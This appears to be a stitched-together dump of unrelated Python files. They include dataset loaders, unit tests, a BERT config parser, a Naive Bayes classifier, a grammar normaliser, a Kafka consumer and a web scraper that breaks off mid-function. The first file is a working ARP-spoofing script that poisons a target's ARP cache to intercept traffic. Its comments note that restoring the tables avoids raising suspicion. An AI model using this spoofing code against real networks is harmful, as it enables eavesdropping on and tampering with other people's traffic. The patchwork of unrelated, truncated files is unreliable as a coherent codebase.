|
from scapy.layers.l2 import Ether, ARP, srp
from scapy.all import send
import os
import sys
def get_mac(ip):
"""
Gets the MAC address of the IP address.
:param ip: IP address to get the MAC of.
:return: MAC address of IP OR None
"""
# Send the ARP request packet asking for the owner of the IP address
    # If the IP is down, i.e. unused, this returns None
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def _enable_ip_routing_windows():
"""
Enables IP forwarding (routing) on Windows systems.
"""
from services import WService
service = WService("Remote Access")
service.start()
def _enable_ip_routing_linux():
    """
    Enables IP forwarding (routing) on Linux systems.
    """
    try:
        file_path = "/proc/sys/net/ipv4/ip_forward"  # sysctl file controlling IP forwarding on Linux
        with open(file_path) as file:
            # The file holds "1" plus a trailing newline when forwarding is on, so strip before comparing.
            if file.read().strip() == "1":  # IP forwarding is already enabled. No further action needed.
                return
        with open(file_path, mode="w") as file:  # open the file in write mode
            print(1, file=file)
    except PermissionError:
        sys.exit("Access denied. Are you root? Try running spoofdogg with \"sudo\"")
def enable_ip_routing():
"""
Enables IP routing for the particular OS.
"""
print("[*] Enabling IP routing...")
if "nt" in os.name:
_enable_ip_routing_windows()
else:
_enable_ip_routing_linux()
print("[*] IP routing enabled.")
def spoof(target, host):
"""
Spoofs target IP by saying the attacker is the host IP
:param target: Target of this spoof. Who are we reaching?
:param host: IP the attacker is spoofing. Who are we?
"""
target_mac = get_mac(target)
# Craft the ARP response saying the attacker is the host.
# No hwsrc specified because by default that's the attacker's MAC address
arp_response = ARP(pdst=target, hwdst=target_mac, psrc=host, op="is-at")
# Send the packet. Verbose=0 means we are sending without printing anything.
send(arp_response, verbose=0)
self_mac = ARP().hwsrc
print("[->] Sent to {} : {} is-at {}".format(target, host, self_mac))
def restore(target, host):
"""
Restores the normal process of a normal network by sending seven regular ARP packets.
This is achieved by sending the original IP address and MAC of the gateway to the target.
In the end everything looks as if nothing weird happened.
If this is not called, the victim loses internet connection and that would be suspicious.
TL:DR -> Everything back to normal, no flags raised.
:param target: Target the attacker is trying to reach.
:param host: The destination attacker is trying to reach
"""
# Original information
target_mac = get_mac(target)
host_mac = get_mac(host)
# Innocent ARP response
arp_response = ARP(pdst=target, hwdst=target_mac, psrc=host, hwsrc=host_mac)
# Send the innocent ARP packet to restore the network to its original condition.
# Sent seven times for good measure
send(arp_response, verbose=0, count=7)
print("[->] Network restored")
print("[->] Sent to {} : {} is-at {}".format(target, host, host_mac))
|
def cockroach_speed(km_h):
return int(km_h / 0.036) # centimeters per second
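# Worked example (assumed, not in the original snippet): 1.08 km/h = 108000 cm / 3600 s
# = 30 cm/s, so cockroach_speed(1.08) == 30.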
|
from os.path import join
from typing import Any, Callable, List, Optional, Tuple
from PIL import Image
from .utils import check_integrity, download_and_extract_archive, list_dir, list_files
from .vision import VisionDataset
class Omniglot(VisionDataset):
"""`Omniglot <https://github.com/brendenlake/omniglot>`_ Dataset.
Args:
root (string): Root directory of dataset where directory
``omniglot-py`` exists.
background (bool, optional): If True, creates dataset from the "background" set, otherwise
creates from the "evaluation" set. This terminology is defined by the authors.
        transform (callable, optional): A function/transform that takes in a PIL image
            and returns a transformed version. E.g., ``transforms.RandomCrop``
        target_transform (callable, optional): A function/transform that takes in the
            target and transforms it.
        download (bool, optional): If true, downloads the dataset zip files from the internet and
            puts them in the root directory. If the zip files are already downloaded, they are not
            downloaded again.
"""
folder = "omniglot-py"
download_url_prefix = "https://raw.githubusercontent.com/brendenlake/omniglot/master/python"
zips_md5 = {
"images_background": "68d2efa1b9178cc56df9314c21c6e718",
"images_evaluation": "6b91aef0f799c5bb55b94e3f2daec811",
}
def __init__(
self,
root: str,
background: bool = True,
transform: Optional[Callable] = None,
target_transform: Optional[Callable] = None,
download: bool = False,
) -> None:
super().__init__(join(root, self.folder), transform=transform, target_transform=target_transform)
self.background = background
if download:
self.download()
if not self._check_integrity():
raise RuntimeError("Dataset not found or corrupted. You can use download=True to download it")
self.target_folder = join(self.root, self._get_target_folder())
self._alphabets = list_dir(self.target_folder)
self._characters: List[str] = sum(
([join(a, c) for c in list_dir(join(self.target_folder, a))] for a in self._alphabets), []
)
self._character_images = [
[(image, idx) for image in list_files(join(self.target_folder, character), ".png")]
for idx, character in enumerate(self._characters)
]
self._flat_character_images: List[Tuple[str, int]] = sum(self._character_images, [])
def __len__(self) -> int:
return len(self._flat_character_images)
def __getitem__(self, index: int) -> Tuple[Any, Any]:
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target character class.
"""
image_name, character_class = self._flat_character_images[index]
image_path = join(self.target_folder, self._characters[character_class], image_name)
image = Image.open(image_path, mode="r").convert("L")
if self.transform:
image = self.transform(image)
if self.target_transform:
character_class = self.target_transform(character_class)
return image, character_class
def _check_integrity(self) -> bool:
zip_filename = self._get_target_folder()
if not check_integrity(join(self.root, zip_filename + ".zip"), self.zips_md5[zip_filename]):
return False
return True
def download(self) -> None:
if self._check_integrity():
print("Files already downloaded and verified")
return
filename = self._get_target_folder()
zip_filename = filename + ".zip"
url = self.download_url_prefix + "/" + zip_filename
download_and_extract_archive(url, self.root, filename=zip_filename, md5=self.zips_md5[filename])
def _get_target_folder(self) -> str:
return "images_background" if self.background else "images_evaluation"
|
import collections
import json
import os.path
import pelops.datasets.chip as chip
import pelops.utils as utils
class DGCarsDataset(chip.ChipDataset):
filenames = collections.namedtuple(
"filenames",
[
"all_list",
"train_list",
"test_list",
]
)
filepaths = filenames(
"allFiles",
"training",
"testing",
)
def __init__(self, dataset_path, set_type=None):
super().__init__(dataset_path, set_type)
self.__set_filepaths() # set self.__filepaths
self.__set_chips()
def __set_filepaths(self):
self.__filepaths = self.filenames(
os.path.join(self.dataset_path, DGCarsDataset.filepaths.all_list),
os.path.join(self.dataset_path, DGCarsDataset.filepaths.train_list),
os.path.join(self.dataset_path, DGCarsDataset.filepaths.test_list),
)
def __set_chips(self):
# identify all the chips, default query to all
name_filepath = {
utils.SetType.ALL: self.__filepaths.all_list,
utils.SetType.TEST: self.__filepaths.test_list,
utils.SetType.TRAIN: self.__filepaths.train_list,
}.get(self.set_type, self.__filepaths.all_list)
# create chip objects based on the names listed in the files
for dg_chip in utils.read_json(name_filepath):
filepath = os.path.normpath(os.path.join(self.dataset_path, dg_chip["filename"]))
car_id = None
cam_id = None
time = None
misc = dg_chip
current_chip = chip.Chip(filepath, car_id, cam_id, time, misc)
self.chips[filepath] = current_chip
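# A minimal usage sketch (assumed): "path/to/dg_cars" is a hypothetical dataset directory
# laid out with the allFiles/training/testing JSON lists this class expects.
if __name__ == "__main__":
    dataset = DGCarsDataset("path/to/dg_cars", utils.SetType.TRAIN)
    print(len(dataset.chips), "chips loaded")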
|
# coding:utf-8
# The with statement
# Requirement 1: file handling. The user needs to obtain a file handle, read data from the file, and then close the file.
with open("text.txt") as f:
data = f.read()
# Using the with statement, no try-finally is needed to ensure the file object is closed: the file object is closed by the system whether or not an exception occurs.
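# For comparison, a sketch of the explicit pattern that "with" replaces (same text.txt assumed):
f = open("text.txt")
try:
    data = f.read()
finally:
    f.close()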
|
class PluginInfo:
def __init__(self) -> None: ...
def __bool__(self) -> bool: ...
@property
def items(self): ...
def __contains__(self, name) -> bool: ...
def __getitem__(self, name): ...
# Names in __all__ with no definition:
# _dispatch
# _mark_tests
|
import keg_storage
class DefaultProfile(object):
# This just gets rid of warnings on the console.
KEG_KEYRING_ENABLE = False
SITE_NAME = 'Keg Storage Demo'
SITE_ABBR = 'KS Demo'
KEG_STORAGE_PROFILES = [
(keg_storage.S3Storage, {
'name': 'storage.s3',
'bucket': 'storage.test',
'aws_region': 'us-east-1',
'aws_access_key_id': 'access-key-id',
'aws_secret_access_key': 'secret-key',
}),
(keg_storage.SFTPStorage, {
'name': 'storage.sftp',
'host': 'example.com',
'username': 'john.doe',
'key_filename': '/key/path',
'known_hosts_fpath': '/known/hosts/path',
'allow_agent': False,
'look_for_keys': False,
})
]
# KEG_STORAGE_DEFAULT_LOCATION = 'storage.s3'
class TestProfile(object):
pass
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/TauDataFormat/TauNtuple/',1)[0])+'/cfipython/slc5_amd64_gcc462/TauDataFormat/TauNtuple')
|
import unittest
import numpy.testing as testing
import numpy as np
import hpgeom as hpg
from numpy import random
import tempfile
import shutil
import os
import pytest
import healsparse
try:
import healpy as hp
has_healpy = True
except ImportError:
has_healpy = False
class HealpixIoTestCase(unittest.TestCase):
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_implicit_read(self):
"""Test reading healpix full (implicit) maps."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healpix_map_ring.fits')
full_map_ring = hp.reorder(full_map, n2r=True)
hp.write_map(filename, full_map_ring, dtype=np.float64)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
# Save map to healpy in nest
filename = os.path.join(self.test_dir, 'healpix_map_nest.fits')
hp.write_map(filename, full_map, dtype=np.float64, nest=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
# Test that we get an exception if reading without nside_coverage
with self.assertRaises(RuntimeError):
sparse_map = healsparse.HealSparseMap.read(filename)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_read(self):
"""Test reading healpix partial (explicit) maps."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healpix_map_ring_explicit.fits')
full_map_ring = hp.reorder(full_map, n2r=True)
hp.write_map(filename, full_map_ring, dtype=np.float64, partial=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
filename = os.path.join(self.test_dir, 'healpix_map_nest_explicit.fits')
hp.write_map(filename, full_map, dtype=np.float64, nest=True, partial=True)
# Read it with healsparse
sparse_map = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
# Check that we can do a basic lookup
testing.assert_almost_equal(sparse_map.get_values_pix(ipnest), test_values)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_write(self):
"""Test writing healpix partial (explicit) maps (floating point)."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a random map
full_map = np.zeros(hpg.nside_to_npixel(nside_map)) + hpg.UNSEEN
full_map[0: 20000] = np.random.random(size=20000)
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healsparse_healpix_partial_map.fits')
sparse_map = healsparse.HealSparseMap(healpix_map=full_map, nside_coverage=nside_coverage, nest=True)
sparse_map.write(filename, format='healpix')
# Read in with healsparse and make sure it is the same.
sparse_map2 = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
np.testing.assert_array_equal(sparse_map2.valid_pixels, sparse_map.valid_pixels)
testing.assert_array_almost_equal(sparse_map2.get_values_pix(ipnest), test_values)
# Read in with healpy and make sure it is the same.
full_map2 = hp.read_map(filename, nest=True)
testing.assert_array_equal((full_map2 > hpg.UNSEEN).nonzero()[0], sparse_map.valid_pixels)
testing.assert_array_almost_equal(full_map2[ipnest], test_values)
@pytest.mark.skipif(not has_healpy, reason="Requires healpy")
def test_healpix_explicit_int_write(self):
"""Test writing healpix partial (explicit) maps (integer)."""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
n_rand = 1000
ra = np.random.random(n_rand) * 360.0
dec = np.random.random(n_rand) * 180.0 - 90.0
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
# Generate a map
full_map = np.zeros(hpg.nside_to_npixel(nside_map), dtype=np.int32)
full_map[0: 10000] = 4
full_map[20000: 30000] = 5
ipnest = hpg.angle_to_pixel(nside_map, ra, dec)
test_values = full_map[ipnest]
filename = os.path.join(self.test_dir, 'healsparse_healpix_int_partial_map.fits')
sparse_map = healsparse.HealSparseMap(
healpix_map=full_map,
nside_coverage=nside_coverage,
nest=True,
sentinel=0
)
with self.assertWarns(UserWarning):
sparse_map.write(filename, format='healpix')
# Read in with healsparse and make sure it is the same.
sparse_map2 = healsparse.HealSparseMap.read(filename, nside_coverage=nside_coverage)
np.testing.assert_array_equal(sparse_map2.valid_pixels, sparse_map.valid_pixels)
testing.assert_almost_equal(sparse_map2.get_values_pix(ipnest), test_values)
# Read in with healpy and make sure it is the same.
full_map2 = hp.read_map(filename, nest=True)
testing.assert_array_equal((full_map2 > hpg.UNSEEN).nonzero()[0], sparse_map.valid_pixels)
# healpy will convert all the BAD_DATA to UNSEEN
good, = (test_values > 0).nonzero()
bad, = (test_values == 0).nonzero()
testing.assert_array_equal(full_map2[ipnest[good]], test_values[good])
testing.assert_array_almost_equal(full_map2[ipnest[bad]], hpg.UNSEEN)
def test_healpix_recarray_write(self):
"""Test that the proper error is raised if you try to persist via healpix format."""
self.test_dir = tempfile.mkdtemp(dir='./', prefix='TestHealSparse-')
nside_coverage = 32
nside_map = 64
filename = os.path.join(self.test_dir, 'test_file.fits')
dtype = [('a', 'f4'), ('b', 'i2')]
sparse_map = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype, primary='a')
with self.assertRaises(NotImplementedError):
sparse_map.write(filename, format='healpix')
def setUp(self):
self.test_dir = None
def tearDown(self):
if self.test_dir is not None:
if os.path.exists(self.test_dir):
shutil.rmtree(self.test_dir, True)
if __name__ == '__main__':
unittest.main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
def get_args():
parser = argparse.ArgumentParser(description='BERT Baseline')
parser.add_argument("--model_name",
default="BertOrigin",
type=str,
help="the name of model")
parser.add_argument("--model_type",
default='bert',
type=str,
help="PTM 基础模型: bert,albert,roberta,xlnet")
# 文件路径:数据目录, 缓存目录
parser.add_argument("--data_dir",
default='/ssd2/songyingxin/songyingxin/dataset/QQP',
type=str,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
parser.add_argument("--output_dir",
default="BertOrigin",
type=str,
help="The output directory where the model predictions and checkpoints will be written.")
# parser.add_argument("--cache_dir",
# default='cache',
# type=str,
# help="缓存目录,主要用于模型缓存")
parser.add_argument("--log_dir",
default='log' + os.sep + 'BertOrigin',
type=str,
help="日志目录,主要用于 tensorboard 分析")
# PTM 相关文件参数
parser.add_argument("--config_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/bert_config.json',
type=str)
parser.add_argument("--vocab_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/bert-base-uncased-vocab.txt',
type=str)
parser.add_argument("--model_file",
default='/ssd2/songyingxin/PreTrainedModels/bert-uncased-base/pytorch_model.bin',
type=str)
    # Text preprocessing parameters
parser.add_argument("--do_lower_case",
default=True,
type=bool,
help="Set this flag if you are using an uncased model.")
parser.add_argument("--max_length",
default=50,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
action='store_true',
help="Whether to run training.")
    # Training parameters
parser.add_argument("--train_batch_size",
default=64,
type=int,
help="Total batch size for training.")
parser.add_argument("--dev_batch_size",
default=8,
type=int,
help="Total batch size for dev.")
parser.add_argument("--test_batch_size",
default=32,
type=int,
help="Total batch size for test.")
parser.add_argument("--num_train_epochs",
default=3,
type=int,
help="训练的 epoch 数目")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="Adam 的 学习率")
parser.add_argument("--weight_decay", default=0.0,
type=float, help="Weight decay if we apply some.")
parser.add_argument("--adam_epsilon", default=1e-8,
type=float, help="Epsilon for Adam optimizer.")
parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.")
parser.add_argument("--warmup_steps", default=0, type=int,
help="Linear warmup over warmup_steps.")
    parser.add_argument('--gradient_accumulation_steps',
                        type=int,
                        default=1,
                        help="number of gradient accumulation steps")
    parser.add_argument('--save_step',
                        type=int,
                        default=1000,
                        help="how many steps between saving the model and writing log info")
    parser.add_argument("--gpu_ids",
                        type=str,
                        default="0",
                        help="GPU device ids")
    parser.add_argument('--seed',
                        type=int,
                        default=42,
                        help="random seed for initialization")
config = parser.parse_args()
return config
if __name__ == "__main__":
get_args()
|
#encoding: utf8
import string
import math
import scripts
class NaiveBayesClassifier:
def __init__(self, alpha = 1):
self.alpha = alpha
return
def fit(self, X, y):
""" Fit Naive Bayes classifier according to X, y. """
        targets = list(set(y))  # list of classes (states)
        words = dict()  # vocabulary of words
        all_targets = dict()  # number of words seen in each class
self.targets = targets
self.words = words
self.all_targets = all_targets
for _target in targets:
all_targets[_target] = 0
for (msg, target) in zip(X, y):
            for word in scripts.morph_analyzer(msg):
                if word not in words:  # first time this word is seen
                    words[word] = dict()
                    for _target in targets:
                        words[word][_target] = 0  # start this word's count at 0 for every class
                words[word][target] += 1
                all_targets[target] += 1
        chances = dict()  # probability of seeing each word in a given class
for word in words:
chances[word] = dict()
for target in targets:
chances[word][target] = (words[word][target] + self.alpha) / (all_targets[target] + self.alpha * len(words))
self.chances = chances
'''line = [(words[word]['never'], word) for word in words]
line.sort(reverse=True)
print(*line, sep='\n')'''
def predict(self, X):
""" Perform classification on an array of test vectors X. """
pre = list()
for msg in X:
final_state = None
final_state_target = ''
for target in self.targets:
state = math.log(self.all_targets[target])
for word in scripts.morph_analyzer(msg):
if word in self.words:
state += math.log(self.chances[word][target])
                if final_state is None:
final_state = state
final_state_target = target
elif state > final_state:
final_state = state
final_state_target = target
pre.append(final_state_target)
return pre
def score(self, X_test, y_test):
""" Returns the mean accuracy on the given test data and labels. """
line = self.predict(X_test)
cnt = 0
for i in range(len(y_test)):
cnt += int(y_test[i] == line[i])
return cnt / len(y_test)
def test():
import scripts
import csv
with open('SMSSpamCollection.csv') as f:
data = list(csv.reader(f, delimiter='\t'))
nbc = NaiveBayesClassifier(0.05)
X = [scripts.clean(elem[1]) for elem in data]
y = [elem[0] for elem in data]
X_train, y_train, X_test, y_test = X[:3900], y[:3900], X[3900:], y[3900:]
nbc.fit(X_train, y_train)
print(nbc.score(X_test, y_test))
|
import copy
class Language(object):
class Rule(object):
def __init__(self, string=None):
if string is not None:
self.__init_from_string(string)
def __init_from_string(self, string):
parts = string.split(' ')
self._from = parts[0]
self._to = []
for i in parts[1:]:
self._to.append(i)
def is_lamda_rule(self):
return len(self._to) == 0
def get_left_side(self):
return self._from[:]
def get_right_side(self):
return self._to[:]
def get_all_symbols(self):
return set([self._from]).union(set(self._to))
def get_splitted_copy(self, terminals_to_replace):
new_rule = copy.deepcopy(self)
for i in range(0, len(new_rule._to)):
if new_rule._to[i] in terminals_to_replace:
new_rule._to[i] = new_rule._to[i] + '\''
return new_rule
def _get_right_part_str(self):
if self.is_lamda_rule():
return chr(955)
else:
return ' '.join(self._to)
def __str__(self):
return '%s -> %s' % (self._from, self._get_right_part_str())
def __repr__(self):
return '%s -> %s' % (self._from, self._get_right_part_str())
def __init_from_file(self, filename):
with open(filename, 'r') as f:
nonterminals_num = int(f.readline())
self._nonterminals = []
for _ in range(0, nonterminals_num):
self._nonterminals.append(f.readline().strip(' \n\t'))
terminals_num = int(f.readline().strip(' \n\t'))
self._terminals = []
for _ in range(0, terminals_num):
self._terminals.append(f.readline().strip(' \n\t'))
rules_num = int(f.readline())
self._rules = []
for _ in range(0, rules_num):
rule = Language.Rule(string=f.readline().strip(' \n\t'))
self._rules.append(rule)
self._start_symbol = f.readline().strip(' \n\t')
def __init_from_data(self, terminals, non_terminals, rules, start):
self._nonterminals = non_terminals[:]
self._terminals = terminals[:]
self._start_symbol = start
self._rules = copy.deepcopy(rules)
def __init__(self, filename=None, terminals=None, non_terminals=None, rules=None, start=None):
if filename is not None:
self.__init_from_file(filename)
elif terminals is not None:
self.__init_from_data(terminals, non_terminals, rules, start)
def split_grammer(self, nonterminals_to_replace):
new_grammers = []
new_rules = []
for rule in self._rules:
new_rules.append(rule.get_splitted_copy(nonterminals_to_replace))
for nonterminal_to_replace in nonterminals_to_replace:
new_nonterminals = list((set(self._nonterminals)-set(nonterminals_to_replace)).union(set([nonterminal_to_replace])))
new_terminals = list(set(self._terminals).union(set([i + '\'' for i in nonterminals_to_replace])))
new_grammers.append(Language(terminals=new_terminals, non_terminals=new_nonterminals, rules=new_rules, start=nonterminal_to_replace))
return new_grammers
def get_Ne(self):
previous_set = set([])
while 1:
current_set = set([])
for rule in self._rules:
if set(rule.get_right_side()).issubset(previous_set.union(set(self._terminals))):
current_set.add(rule.get_left_side())
if current_set == previous_set:
break
previous_set = current_set
return list(previous_set)
def remove_unnecessary_nonterminals(self):
ne = self.get_Ne()
new_nonterminals = list(filter(lambda x: x in ne, self._nonterminals))
new_rules = list(filter(lambda x: x.get_all_symbols().issubset(set(self._terminals).union(set(ne))), self._rules))
self._nonterminals = new_nonterminals
self._rules = new_rules
def remove_unreachable_symbols(self):
previous_set = set([self._start_symbol])
while 1:
current_set = copy.deepcopy(previous_set)
for rule in self._rules:
if rule.get_left_side() in previous_set:
for i in rule.get_right_side():
current_set.add(i)
if current_set == previous_set:
break
previous_set = current_set
self._nonterminals = list(set(self._nonterminals).intersection(previous_set))
self._terminals = list(set(self._terminals).intersection(previous_set))
self._rules = list(filter(lambda x: x.get_all_symbols().issubset(previous_set), self._rules))
def delete_long_rules(self):
extra_nonterm_num = 0
new_rules = []
new_nonterminals = []
for rule in self._rules:
if len(rule.get_right_side()) <= 2:
new_rules.append(rule)
continue
new_rules.append(Language.Rule("%s %s %s" % (rule.get_left_side(), rule.get_right_side()[0], "EXTRA_NONTERMINAL_%s" % extra_nonterm_num)))
self._nonterminals.append("EXTRA_NONTERMINAL_%s" % extra_nonterm_num)
extra_nonterm_num = extra_nonterm_num + 1
for i in range(1, len(rule.get_right_side()) - 2):
new_rules.append(Language.Rule("%s %s %s" % ("EXTRA_NONTERMINAL_%s" % extra_nonterm_num - 1, rule.get_right_side()[i], "EXTRA_NONTERMINAL_%s" % extra_nonterm_num)))
self._nonterminals.append("EXTRA_NONTERMINAL_%s" % extra_nonterm_num)
extra_nonterm_num = extra_nonterm_num + 1
new_rules.append(Language.Rule("%s %s %s" % ("EXTRA_NONTERMINAL_%s" % (extra_nonterm_num - 1, ), rule.get_right_side()[len(rule.get_right_side()) - 2], rule.get_right_side()[len(rule.get_right_side()) - 1])))
self._rules = new_rules
def delete_chain_rules(self):
chain_pairs = [(A, A) for A in self._nonterminals]
found_new = True
while found_new:
found_new = False
new_chain_pairs = []
for chain_pair in chain_pairs:
for rule in self._rules:
if (len(rule.get_right_side()) != 1) or (rule.get_right_side()[0] not in self._nonterminals):
continue
if (chain_pair[1] == rule.get_left_side()) and ((chain_pair[0], rule.get_right_side()[0]) not in chain_pairs):
new_chain_pairs.append((chain_pair[0], rule.get_right_side()[0]))
found_new = True
chain_pairs.extend(new_chain_pairs)
new_rules = []
for chain_pain in chain_pairs:
for rule in self._rules:
if ((len(rule.get_right_side()) == 1) and (rule.get_right_side()[0] in self._nonterminals)) or (chain_pain[1] != rule.get_left_side()):
continue
new_rules.append(Language.Rule("%s %s" % (chain_pain[0], ' '.join(rule.get_right_side()))))
for rule in self._rules:
if (len(rule.get_right_side()) != 1) or (rule.get_right_side()[0] not in self._nonterminals):
new_rules.append(rule)
self._rules = new_rules
def remake_double_terms(self):
new_rules = []
placeholder = 0
for rule in self._rules:
if (len(rule.get_right_side()) != 2):
new_rules.append(rule)
continue
rule_str = rule.get_left_side() + ' '
if rule.get_right_side()[0] in self._terminals:
rule_str = rule_str + ("PLACEHOLDER_%s" % placeholder) + ' '
new_rules.append(Language.Rule("%s %s" % ("PLACEHOLDER_%s" % placeholder, rule.get_right_side()[0])))
self._nonterminals.append("PLACEHOLDER_%s" % placeholder)
placeholder = placeholder + 1
else:
rule_str = rule_str + rule.get_right_side()[0] + ' '
if rule.get_right_side()[1] in self._terminals:
rule_str = rule_str + ("PLACEHOLDER_%s" % placeholder)
new_rules.append(Language.Rule("%s %s" % ("PLACEHOLDER_%s" % placeholder, rule.get_right_side()[1])))
self._nonterminals.append("PLACEHOLDER_%s" % placeholder)
placeholder = placeholder + 1
else:
rule_str = rule_str + rule.get_right_side()[1]
new_rules.append(Language.Rule(rule_str))
self._rules = new_rules
def __repr__(self):
return self.__str__()
def __str__(self):
return "Non-terminals: %s\nTerminals: %s\nRules: %s\nStart symbol: %s" % (self._nonterminals, self._terminals, self._rules, self._start_symbol)
def build_parse_table(self, terminal_chain):
terminal_chain = terminal_chain.split(' ')
parse_table = [[set() for _ in range(0, len(terminal_chain) - i)] for i in range(0, len(terminal_chain))]
for i in range(0, len(terminal_chain)):
for rule in self._rules:
if terminal_chain[i] in rule.get_right_side():
parse_table[i][0].add(rule.get_left_side())
print(parse_table)
for j in range(2, len(terminal_chain) + 1):
for i in range(1, len(terminal_chain) - j + 2):
for k in range(1, j):
for rule in self._rules:
if len(rule.get_right_side()) != 2:
continue
B = rule.get_right_side()[0]
C = rule.get_right_side()[1]
if (B in parse_table[i - 1][k - 1]) and (C in parse_table[i + k - 1][j - k - 1]):
parse_table[i - 1][j - 1].add(rule.get_left_side())
return parse_table
def left_parsing(self, terminal_chain, parse_table):
terminal_chain = terminal_chain.split(' ')
def gen(i, j, A):
if j == 1:
for rule in self._rules:
if (rule.get_right_side()[0] == terminal_chain[i - 1]) and (rule.get_left_side() == A):
print(rule)
return
for k in range(1, j):
for rule in self._rules:
if len(rule.get_right_side()) != 2:
continue
if rule.get_left_side() != A:
continue
B = rule.get_right_side()[0]
C = rule.get_right_side()[1]
if (B in parse_table[i - 1][k - 1]) and (C in parse_table[i + k - 1][j - k - 1]):
print(rule)
gen(i, k, B)
gen(i + k, j - k, C)
return
if self._start_symbol not in parse_table[0][len(parse_table) - 1]:
print('Impossible terminal chain')
gen(1, len(terminal_chain), self._start_symbol)
language = Language(filename='grammer728.txt')
print('Original grammar:')
print(language)
print('')
print('')
print('Delete long rules:')
language.delete_long_rules()
print(language)
print('')
print('')
print('Delete chain rules:')
language.delete_chain_rules()
print(language)
print('')
print('')
print('Delete extra symbols:')
language.remove_unnecessary_nonterminals()
language.remove_unreachable_symbols()
print(language)
print('')
print('')
print('Chomsky normal form:')
language.remake_double_terms()
print(language)
terminal_chain = 'not ( ( ( a + b ) * ( - a ) / ( pi * pi ) ) div ( b * b ) )'
parse_table = language.build_parse_table(terminal_chain)
print('')
print('')
print('Parsing table')
for i in range(0, len(terminal_chain.split(' '))):
for j in range(0, len(terminal_chain.split(' ')) - i):
print(i + 1, j + 1)
print(parse_table[i][j], )
print()
print('')
print('')
print('Production')
language.left_parsing(terminal_chain, parse_table)
|
from kafka import KafkaConsumer
import json
import io
topic = 'electric'
value_deserializer = lambda m: json.loads(m.decode('ascii'))
group_id = 'electric-group'
consumer = KafkaConsumer(topic, group_id=group_id, value_deserializer=value_deserializer)
print("Consumer connected : ", consumer.bootstrap_connected())
i = 0
for msg in consumer:
print(i, " Message is : ",msg)
i = i+1
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 3 15:28:16 2019
@author: dhk13
"""
from bs4 import BeautifulSoup as soup
import requests
import datetime
def SWedu(today1):
url="http://swedu.khu.ac.kr/board5/bbs/board.php?bo_table=06_01"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("div", {"class":"colgroup"}).find("div",{"id":"bo_list"}).find("form",{"id":"fboardlist"}).find("tbody").findAll("tr")
newsbox=[]
for i in table:
date=i.find("td",{"class":"td_datetime"}).text.strip()
if(date==today1):
title=i.find("td", {"class":"td_subject"})
title=title.find("div",{"class":"bo_tit"})
title=title.find("a").text.strip() #제목
newsbox.append(title)
if(len(newsbox)==0):
newsbox.append("No New Issue on SW중심사업단\n")
temp_response={
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "간단한 텍스트 요소입니다."
}
}
]
}
}
#return newsbox
return temp_response
def KIC(today2):
url="http://kic.khu.ac.kr/notice/undergraduate/"
html=requests.get(url).text
obj=soup(html, "html.parser")
table=obj.find("body").find("article").find("div", {"class":"kboard-list"}).findAll("tr")
table=table[1:]
newsbox=[]
for row in table:
date=row.find("td",{"class":"kboard-list-date"}).text.strip()
if(date==today2):
title=row.find("td",{"class":"kboard-list-title"}).find("a").find("div",{"class":"kboard-default-cut-strings"}).text.strip()
newsbox.append(title)
if(len(newsbox)==0):
